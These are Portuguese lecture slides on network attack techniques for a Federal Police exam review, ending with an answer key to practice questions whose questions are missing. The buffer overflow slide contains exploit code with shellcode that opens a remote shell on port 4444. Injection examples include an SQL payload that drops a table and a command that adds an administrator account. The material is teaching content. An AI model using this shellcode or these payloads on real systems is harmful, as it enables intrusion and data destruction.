Usuários legítimos ficam impedidos de acessar o recurso;

Pode “derrubar” um servidor, encher um link, estourar a memória ou explorar uma vulnerabilidade.


SYN FloodingCliente Servidor

SYN seq= x

SYN seq= y, ACK x + 1

ACK y + 1

Conexão estabelecida

Vários pacotes SYN

Fila das conexõesdo servidor cheia

SYN flooding


Smurf e Fraggle

Pacote PING (ICMP echo) para o endereço broadcast da rede, usando IP Spoofing;

Todos os hosts da rede respondem ao PING para o host que teve o seu endereço falsificado (IP Spoofing);

Duas vítimas: a rede, que fica congestionada, e o host que teve o seu endereço falsificado.

Fraggle usa UDP ao invés de ICMP.


Session Hijacking (Sequestro de sessões)

Man-in-the-Middle ou Session Hijacking;

Explora o prognóstico do número de seqüência (sequence number prediction) do three-way handshake;

O atacante fica entre o cliente e o servidor, podendo assim alterar toda a comunicação entre eles;

O atacante envia informações infiltrando-se nas conexões, baseado na descoberta do número de seqüência dessas conexões.


Ataques coordenados

Ataque de negação de serviço distribuído, ou Distributed Denial-of-Service (DDoS);

Dificuldade de descobrir a origem dos ataques: milhares de origens do ataque;

Botnets - Redes de zumbis (bots) que atendem a comandos de uma central de comando e controle (C2), realizando ataques contra alvos determinados pelos seus mestres

Todos os zumbis e os alvos de seus ataques são vítimas.


Buffer Overflow

Exploração de uma falha na aplicação, onde uma variável do programa pode expor outras áreas da memória ao hacker, permitindo sua manipulação, mesmo remota, com o carregamento de códigos maliciosos.

Muitas técnicas auxiliam na descobertas destas vulnerabilidades, tornando-se cada vez mais comuns

Ataques em redes de computadores#buffer = "A" * 2000buffer="\x41"*969

buffer+="\xed\x1e\x94\x7c"#buffer+="\7c" + "\94" + "\1E" + "\ED"

#buffer+="\x42" * 4buffer+="\x43" * 16buffer+="\x90" * 16

buffer+=("\xb8\x52\x1c\x20\xa1\xd9\xe1\xd9\x74\x24\xf4\x5a\x33\xc9\xb1""\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x5d\xfe\xd5\x5d\x89\x77""\x15\x9e\x49\xe8\x9f\x7b\x78\x3a\xfb\x08\x28\x8a\x8f\x5d\xc0""\x61\xdd\x75\x53\x07\xca\x7a\xd4\xa2\x2c\xb4\xe5\x02\xf1\x1a""\x25\x04\x8d\x60\x79\xe6\xac\xaa\x8c\xe7\xe9\xd7\x7e\xb5\xa2""\x9c\x2c\x2a\xc6\xe1\xec\x4b\x08\x6e\x4c\x34\x2d\xb1\x38\x8e""\x2c\xe2\x90\x85\x67\x1a\x9b\xc2\x57\x1b\x48\x11\xab\x52\xe5""\xe2\x5f\x65\x2f\x3b\x9f\x57\x0f\x90\x9e\x57\x82\xe8\xe7\x50""\x7c\x9f\x13\xa3\x01\x98\xe7\xd9\xdd\x2d\xfa\x7a\x96\x96\xde""\x7b\x7b\x40\x94\x70\x30\x06\xf2\x94\xc7\xcb\x88\xa1\x4c\xea""\x5e\x20\x16\xc9\x7a\x68\xcd\x70\xda\xd4\xa0\x8d\x3c\xb0\x1d""\x28\x36\x53\x4a\x4a\x15\x3c\xbf\x61\xa6\xbc\xd7\xf2\xd5\x8e""\x78\xa9\x71\xa3\xf1\x77\x85\xc4\x28\xcf\x19\x3b\xd2\x30\x33""\xf8\x86\x60\x2b\x29\xa6\xea\xab\xd6\x73\xbc\xfb\x78\x2b\x7d""\xac\x38\x9b\x15\xa6\xb6\xc4\x06\xc9\x1c\x73\x01\x07\x44\xd0""\xe6\x6a\x7a\xc7\xaa\xe3\x9c\x8d\x42\xa2\x37\x39\xa1\x91\x8f""\xde\xda\xf3\xa3\x77\x4d\x4b\xaa\x4f\x72\x4c\xf8\xfc\xdf\xe4"

"\x6b\x76\x0c\x31\x8d\x89\x19\x11\xc4\xb2\xca\xeb\xb8\x71\x6a""\xeb\x90\xe1\x0f\x7e\x7f\xf1\x46\x63\x28\xa6\x0f\x55\x21\x22""\xa2\xcc\x9b\x50\x3f\x88\xe4\xd0\xe4\x69\xea\xd9\x69\xd5\xc8""\xc9\xb7\xd6\x54\xbd\x67\x81\x02\x6b\xce\x7b\xe5\xc5\x98\xd0""\xaf\x81\x5d\x1b\x70\xd7\x61\x76\x06\x37\xd3\x2f\x5f\x48\xdc"

"\xa7\x57\x31\x00\x58\x97\xe8\x80\x66\x69\x20\x1d\xfe\xd0\xd1""\x5c\x62\xe3\x0c\xa2\x9b\x60\xa4\x5b\x58\x78\xcd\x5e\x24\x3e"

"\x3e\x13\x35\xab\x40\x80\x36\xfe")buffer+="\xCC" * 630

Acionamento da vulnerabilidade

Código malicioso que criará uma porta adicional (4444/TCP) e dará acesso remoto ao

shell do computador

Ataques em redes de computadoresTipos de shell

Normalmente um ataque buffer overflow é usado para obter um shell no sistema alvo

Existem dois tipos básicos

Direct shell - Uma porta é aberta no sistema alvo e é associada a um shell do sistema operacional

Reverse shell - O código malicioso que foi executado no alvo estabelece uma conexão com o computador do atacante e transmite, através desta conexão, o acesso ao shell no sistema alvo

Conseguimos criar um shell (reverso ou direto) com algumas ferramentas, como o Netcat (comando nc no Linux) que permite algumas outras atividades ou com o Meterpreter, parte integrante do Metasploit, que é capaz de entregar ao atacante um shell avançado, com algumas funções para simplificar a coleta de informações no servidor alvo.


Shell reverso e tunneling

Uma das grandes vantagens do shell reverso é a possibilidade de bypass o firewall local, pois não há necessidade em abrir uma porta no alvo. O alvo se comunica com o atacante

Contudo, pela existência de um firewall, pode ser impossível um ataque a determinada porta que tenhamos descoberto haver outra vulnerabilidade a ser explorada.

Nestes cenários podemos aplicar uma técnica chamada tunneling, onde usamos um cliente de SSH no alvo que já obtivemos acesso para redirecionar o tráfego a uma outra porta local (por exemplo 3389/TCP - Remote desktop no Windows) atráves de um túnel cifrado pelo SSH


Escaneamento

Atividade realizada para descobrir portas e serviços nos hosts alvo

Se feito corretamente pode passar desapercebido para o administrador da rede

Contudo, sem os devidos cuidados pode aparecer imediatamente nas telas de IDS/IPS da rede


Three-way handshake do TCP

Three-way handshake do TCP:

O cliente envia uma requisição de conexão – pacote SYN;

O servidor recebe o pacote SYN e responde com uma resposta de reconhecimento (acknowledgement) – pacote SYN-ACK;

O cliente reconhece o pacote SYN-ACK – pacote ACK;

A conexão é estabelecida (three-way handshake);

A troca de dados acontece;

A conexão é encerrada com um pacote com flag FIN;

A conexão é encerrada de forma anormal com pacote RST.


TCP Connect:

Cliente envia um pacote SYN para a porta;

Caso o servidor aceite a conexão, a porta está aberta;

Caso contrário, a porta está fechada.

TCP SYN (half open):

Cliente envia um pacote SYN para a porta;

Caso o servidor responda com SYN-ACK, o cliente envia RST – a conexão é encerrada antes do seu estabelecimento.


UDP:

Cliente envia um pacote UDP de 0 byte para a porta;

Caso o servidor envie um pacote ICMP Port Unreachable, a porta está fechada;

Caso contrário, a porta está aberta.

FIN:

Modo stealth, ou seja, são mais difíceis de serem detectados;

Pacote FIN é enviado para a porta do servidor;

Caso um pacote RST é recebido, a porta está fechada.


Null Scan:

Modo stealth;

Pacote FIN, sem nenhum flag, é enviado para a porta do servidor;


FIN:

Modo stealth;

Pacote FIN com os flags FIN, PUSH e URG ativados é enviado para a porta do servidor;


Ataques em redes de computadoresIdle Scan

Técnica utilizada para fazer escaneamento oculto

Se baseia na avaliação do contado de pacote IP (IPID) do protocolo TCP/IP

Previamente ele manda um SYN para um host Zumbi e determina qual o IPID atual dele.

O atacante manda um pacote SYN para o alvo, com o IP spoofado do host Zumbi, direcionado a porta que ele deseja testar se está aberta ou não.

Depois o hacker testa novamente o atual IPID do host Zumbi

Se houve incremendo do IPID então a porta está aberta, pois o host alvo respondeu para o zumbi com um “SYN-ACK”

Se não houver incremento a porta está fechada, pois o host respondeu ao Zumbi com um pacote “RST”

Caso haja um IPS no host alvo apenas aparecerá os logs dos pacotes do zumbi, mas não do atacante real


Idle Scan (cont.)


Ferramentas para escanemento

NMAP - A mais popular das ferramentas para escanemento

Muito versátil, possui diversos recursos para descoberta de vulnerabilidades e “bypass” de IDS / IPS

Ataques em redes de computadores# nmap -A -T4 scanme.nmap.org playground

Starting nmap ( http://insecure.org/nmap/ )Interesting ports on scanme.nmap.org (205.217.153.62):(The 1663 ports scanned but not shown below are in state: filtered)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)53/tcp open domain70/tcp closed gopher80/tcp open http Apache httpd 2.0.52 ((Fedora))113/tcp closed authDevice type: general purposeRunning: Linux 2.4.X|2.5.X|2.6.XOS details: Linux 2.4.7 - 2.6.11, Linux 2.6.0 - 2.6.11Uptime 33.908 days (since Thu Jul 21 03:38:03 2005)

Interesting ports on playground.nmap.org (192.168.0.40):(The 1659 ports scanned but not shown below are in state: closed)PORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn389/tcp open ldap?445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds1002/tcp open windows-icfw?1025/tcp open msrpc Microsoft Windows RPC1720/tcp open H.323/Q.931 CompTek AquaGateKeeper5800/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port: 5900)5900/tcp open vnc VNC (protocol 3.8)MAC Address: 00:A0:CC:63:85:4B (Lite-on Communications)Device type: general purposeRunning: Microsoft Windows NT/2K/XPOS details: Microsoft Windows XP Pro RC1+ through final releaseService Info: OSs: Windows, Windows XP

Nmap finished: 2 IP addresses (2 hosts up) scanned in 88.392 seconds

Ataques em redes de computadoresNMAP - Opções mais comuns

-sP - Ping Scan - Procura hosts através de ICMP

-P0 - Não faz mais um ICMP discovery prévio

-sS (TCP SYN), -sT (Connect), -sA (ACK), sU (Scan UDP ports)

-sI - Idle Scan

-p Lista de portas a escanear (se for omitido escaneará as chamadas Well Known ports)

-sV - Tenta obter informações sobre o serviço rodando nas portas abertas

-O - OS Fingerprint detection

-T[0-5] - Regula a velocidade dos scans

-f - Fragmentar pacotes

-D - Decoy

-S <ip_address> - Spoofar o IP


Ferramentas para atacar - Metasploit Framework

Consite em um framework completo, com diversos exploit prontos para uso, ferramentas para descoberta de novas vulnerabilidades, dentre outros

Muito utilizado por hackers, auditores de segurança e estudantes da área

De simples utilização (pode até mesmo ser automatizado)

Novos exploits são adicionados diáriamente e suas atualizações são gratúitas

Faz parte da distribuição Linux “Backtrack”


Ferramentas para ataques em Web App

Nikto

Scanner de vulnerabilidades em servidores WEB

Muito útil para descobrir fraquezas e erros de configuração em servidores WEB

Simples de usar

Faz parte do “Backtrack”

Algumas informações podem também ser obtidas com um telnet paras a porta do servidor WEB e um comando HTTP (exemplo HEAD/HTTP/1.0 pode retornar o banner do servidor)

Ataques em redes de computadoresAtaques de injeção

Em algumas situações é possível injetar informações em formulários e alterar o comportamento de uma aplicação. Os tipos mais comuns são

Injeção SQL - Atua modificando uma requisição legítima de SQL (ex: Fazer a autenticação de um usuário) para outra a escolha o hacker.

Ex: Consulta SQL normal: select * from user where senha =<Formulario>;

Ao digitarmos no formulário WEB a consulta abaixo no lugar da senha:

‘ or 1=1 --; droptable(<nome_tabela>);

Ao invés de fazer uma tentativa de login nós apagaremos a tabela de usuários.

Injeção de comandos - Comum em sistemas que executam comandos remotos e pedem o parametro por um formulário web (exemplo: traceroute para um destino definido pelo formulário). Se ao invés do IP fosse digitado:

; net user /add hacker hacker | net localgroup administrator hacker;

Ao invés de fazermos o traceroute nós criariamos um usuário, com acesso total (pois seria administrador), podendo conceder acesso via Remote Desktop (se fosse linux bastaria criar um usuário, clocar no grupo root e acessar via SSH).


Ferramentas para ataques em Web App

Dirbuster

Ferramenta que descobre arquivos hospedados em um servidor WEB, mesmo que estejam ocultos, com um uso de um arquivo de dicionário

Testa o servidor WEB procurando erros. Se tentar acessar determinado arquivo e receber uma mensagem, dizendo que o arquivo existe, mesmo que não seja possível acesso a ele, o mesmo será exibido em uma listagem.

Questões para praticar


Resposta: C


Respostas: A,B,C,D. Sam Spade é um pacote de ferramentas antigo, que pode fazer ping, traceroute e outras funções. Cheops é uma ferramenta de monitoramento de rede.


Resposta: B


Respostas: A, C, E


Resposta: A - Usuários administradores tem sempre seu RID (relative identifier) começando com 500


Resposta: D


Resposta: C


Resposta: A


Respostas: A e B


Resposta: E


Resposta: D


Resposta: C


Respostas: A e B. Notar que os 8 caracteres são identicos


Resposta: D


Resposta: A


Resposta: D


Resposta: E


Resposta: B - Consultar a tabela ASCII para entender a linha “0B0”


Resposta: B


Resposta: C - Converter o número para binário, depois pegar os últimos 8 bits e converter para decimal, obtendo o .5


Resposta: A


Revisão de provas da PF

pf perito criminal

Documents